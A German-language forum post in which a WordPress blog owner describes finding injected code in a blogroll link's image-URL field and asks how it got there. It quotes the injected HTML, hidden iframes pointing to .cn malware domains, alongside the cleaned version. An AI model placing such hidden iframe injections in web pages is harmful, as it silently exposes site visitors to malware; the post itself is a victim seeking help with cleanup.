Wie kommt der Fremde Code in das Feld "Bild-URL" eines Links...?

Hallo Gemeinde

Ich hab ein kleines Blog - noch nicht sehr lange, und versuche mich etwas in Wordpress.

Vor ca. 2 Monaten, habe ich festgestellt, dass die Kommentarfunktion für Spam missbraucht wird - offenbar von Russland aus. Ich habe dann ein Captcha Plugin (Si Captcha) eingeschaltet und gut war.

Anfang April erhalte ich dann einen einzigen Kommentar wo unter Website steht: Casino 1238919192 und eine IP 83.233.......
Ich war etwas überrascht, da ich weiss, dass im Moment noch kaum etwas läuft auf meiner Website (was für mich im Moment auch ganz i.O. ist, da ich eh wenig Zeit hab dafür und auch kaum Inhalt vorhanden ist...)
Nun - offenbar war das wieder ein Spam Kommentar -ziemlich sinnlos - hat aber irgendwie die Hürde Captcha geschafft - wie - keine Ahnung ...

Aber mir ist aufgefallen, dass auf meiner Seite (ich verwende das Theme "Journalist") plötzlich eine ganze Reihe Links fehlen - u.a. auch der Link, der zur Administrationsseite führt. Ich dachte dabei noch nichts böses.... musste aber feststellen, dass der Virenscanner anschlug und was über eine chinesiche Seite motzte (Malware und so ...). Auch der Safari hat angeschlagen mit der Meldung: "Warning: Visiting this site may harm your computer" und dann die Domäne divinets.cn.

Mit Google konnte ich dann auch feststellen, dass mit dieser Site auch was nicht in Ordnung ist ....

Ich hab dann mal Quellcode geöffnet und bald festgestellt, dass es da folgenden Code drin hat mit Links zu chinesischen Seiten, den ich mir nicht erklären konnte:

<h3>Wordpress</h3>
<ul class='xoxo blogroll'>
<li><a href="http://codex.wordpress.org/"><img src="" width="0" height="0"/>Documentation</a><iframe src=http://hostads.cn style=display:none></iframe><a href=# style=display:none><img width="0" height="0" src="" width="0" height="0"/>Documentation</a><iframe src=http://gcounter.cn style=display:none></if" alt="Documentation" /></a></li>
<li><a href="http://wordpress.org/extend/plugins/">Plugins</a></li>

Ich hab dann mal die ganze Site auf meinen Rechner via FTP runtergeladen und konnte im Quellcode auch nirgends einen Hinweis auf eine .cn-Domäne finden.
Auch konnte ich anhand des Quellcodes erkennen, dass die verschwundenen Links schon da wären, aber einfach nicht angezeigt werden, wegen diesen obigen, roten Zeilen.

So habe ich nun auf der Administrationsoberfläche die Links angeschaut und festgestellt, dass da jemand sich an dem Link zur Dokumentation zu schaffen gemacht hat und dort im Feld für die "Bild-URL" diesen zusätzlichen Code eingegeben hat. Den hab ich dann gelöscht und Safari hat dann auch nicht mehr gemotzt und alle Links waren wieder sichtbar:

so, sieht der Code korrekterweise aus:
<h3>Wordpress</h3>
<ul class='xoxo blogroll'>
<li><a href="http://codex.wordpress.org/">Documentation</a></li>
<li><a href="http://wordpress.org/extend/plugins/">Plugins</a></li>

Hat jemand eine Idee, wie der Code in dieses Feld hinein kommen konnte? (der war ja dann in der MySql Datenbank drin). Ich benutze Wordpress 2.7.1 bei einem Hoster. Ausser mir hat niemand die Zugangsdaten ... (so viel ich weiss :mrgreen

Herzlichen Dank für jeden Tipp

 

Danke - schau ich mir mal an. Passwörter kann ich schon mal ausschliessen (Zufallspasswörter, mindestens 8 Zeichen lang) und auch veraltete Plugins - ob sie fehlerhaft sind, naja, das weiss ich natürlich nicht, aber ich hab zur Zeit genau ein Plugin zusätzlich installiert (das si captcha) und als theme den (meines wissens) recht verbreiteten Journalist ....
Hingegen auf die MySql und PHP Versionen habe ich keinen Einfluss